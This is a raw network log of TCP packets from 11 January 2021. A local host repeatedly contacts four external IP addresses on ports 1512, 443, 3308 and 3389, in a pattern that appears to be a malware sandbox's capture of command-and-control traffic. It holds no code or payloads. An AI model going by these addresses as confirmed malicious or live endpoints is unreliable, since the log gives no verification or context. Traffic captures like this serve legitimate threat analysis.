Jan 11, 2021 16:53:53.672816038 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.672982931 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.725809097 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.725930929 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.764858961 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.778886080 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.778928041 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.881820917 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.881861925 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.882131100 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.887866020 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.940671921 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:54.002706051 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.055813074 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.055932045 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.057248116 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.109289885 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.124471903 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.124597073 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.142592907 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.197113037 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.197355032 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.204257011 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.204513073 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.256697893 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.256823063 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.294888020 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.309174061 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.426670074 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.426716089 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.426915884 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.432486057 CET	49347	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:54.484729052 CET	443	49347	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:54.564436913 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.607562065 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.607713938 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.609348059 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.652385950 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.663697958 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.663727999 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.663834095 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.663876057 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.678654909 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.723773956 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.724055052 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.734816074 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.735146999 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.778274059 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.778387070 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.818880081 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.821471930 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.821499109 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.932765961 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.932811975 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:54.932991028 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.938589096 CET	49348	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:54.982244968 CET	3308	49348	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:55.048178911 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.101823092 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.101991892 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.103563070 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.158010006 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.181427956 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.181464911 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.181534052 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.181552887 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.195475101 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.258228064 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.258475065 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.263597012 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.263681889 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.317687035 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.317789078 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.357155085 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.371661901 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.371701956 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.461056948 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.461095095 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.461255074 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.461272001 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.463263988 CET	49349	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:55.516767979 CET	3389	49349	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:55.575232029 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.628230095 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.628509045 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.630147934 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.683037996 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.690589905 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.690629959 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.690737963 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.690793037 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.707245111 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.761482000 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.761765003 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.771862984 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.772224903 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.825221062 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.825401068 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.864965916 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.878453970 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.978920937 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.978965998 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:55.979239941 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:55.984870911 CET	49350	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:56.037853956 CET	1512	49350	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:56.090296030 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.142611980 CET	443	49351	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:56.142779112 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.145004988 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.197066069 CET	443	49351	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:56.212049007 CET	443	49351	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:56.212104082 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.228179932 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.282778025 CET	443	49351	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:56.283004999 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.288929939 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.289221048 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.341521978 CET	443	49351	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:56.341672897 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.394136906 CET	443	49351	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:56.511169910 CET	443	49351	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:56.511209011 CET	443	49351	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:56.511430025 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.519306898 CET	49351	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:56.571723938 CET	443	49351	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:56.639466047 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:56.682564974 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:56.682678938 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:56.684297085 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:56.727252960 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:56.738042116 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:56.738068104 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:56.738168955 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:56.753133059 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:56.797799110 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:56.797987938 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:56.807276011 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:56.807564020 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:56.850642920 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:56.850836039 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:56.890912056 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:56.893872023 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:57.006088018 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:57.006149054 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:57.006321907 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:57.012687922 CET	49352	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:57.055823088 CET	3308	49352	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:57.123145103 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.176788092 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.176920891 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.178642988 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.231872082 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.254621983 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.254640102 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.254745007 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.269421101 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.337603092 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.337831974 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.343091965 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.343221903 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.396784067 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.396857977 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.436321974 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.453783989 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.453821898 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.542351961 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.542412996 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.542586088 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.542623043 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.548144102 CET	49353	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:57.601445913 CET	3389	49353	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:57.664832115 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.717715979 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:57.717807055 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.719275951 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.772116899 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:57.778877974 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:57.778913021 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:57.778985977 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.779036999 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.794967890 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.849350929 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:57.849575043 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.859553099 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.859703064 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.912450075 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:57.912703037 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:57.948775053 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:57.965483904 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:57.965503931 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:58.064817905 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:58.064860106 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:58.065042019 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:58.071011066 CET	49354	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:58.123832941 CET	1512	49354	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:58.188163042 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.240514994 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.240658998 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.242300987 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.294430017 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.309087992 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.309247971 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.326189041 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.380728960 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.380897999 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.385613918 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.385869980 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.438071966 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.438340902 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.490739107 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.490791082 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.607109070 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.607152939 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.607362032 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.611738920 CET	49355	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:58.663938999 CET	443	49355	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:58.731822968 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:58.775082111 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:58.775176048 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:58.775947094 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:58.818926096 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:58.833192110 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:58.833228111 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:58.833465099 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:58.846766949 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:58.891532898 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:58.891705036 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:58.902348042 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:58.902622938 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:58.945641994 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:58.945916891 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:58.986135960 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:58.988950968 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:58.988966942 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:59.100193977 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:59.100236893 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:59.100310087 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:59.100363970 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:59.105993032 CET	49356	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:59.149058104 CET	3308	49356	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:59.229121923 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.289244890 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.289380074 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.290344000 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.345312119 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.380269051 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.380285978 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.380341053 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.388957024 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.453744888 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.454108953 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.464380980 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.464503050 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.517807961 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.517956972 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.557358980 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.572035074 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.572077036 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.662425995 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.662467957 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.662653923 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.662705898 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.668800116 CET	49357	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:59.722572088 CET	3389	49357	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:59.791249990 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:59.844180107 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:59.844336987 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:59.845901966 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:59.898555994 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:59.906148911 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:59.906168938 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:59.906367064 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:59.916668892 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:59.970597029 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:59.970755100 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:59.974509954 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:59.974663019 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:00.027373075 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:00.027482033 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:00.064702034 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:00.080284119 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:00.080323935 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:00.183238983 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:00.183281898 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:00.183458090 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:00.189169884 CET	49358	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:00.241919041 CET	1512	49358	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:00.305597067 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.357830048 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.357996941 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.359519005 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.411250114 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.425838947 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.425942898 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.436589003 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.490889072 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.491033077 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.503679991 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.503988981 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.555807114 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.555972099 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.594868898 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.610207081 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.728044987 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.728097916 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.728270054 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.733911991 CET	49359	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:00.785598040 CET	443	49359	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:00.852349997 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:00.897950888 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:00.898062944 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:00.899564981 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:00.944397926 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:00.956000090 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:00.956043959 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:00.956165075 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:00.956188917 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:00.971852064 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:01.020371914 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:01.020472050 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:01.030200958 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:01.030400038 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:01.075479984 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:01.075699091 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:01.114164114 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:01.118984938 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:01.119024038 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:01.230879068 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:01.230922937 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:01.231220961 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:01.237066031 CET	49360	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:01.280286074 CET	3308	49360	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:01.347390890 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.401974916 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.402067900 CET	49361	3389	192.168.2.22	5.100.228.233
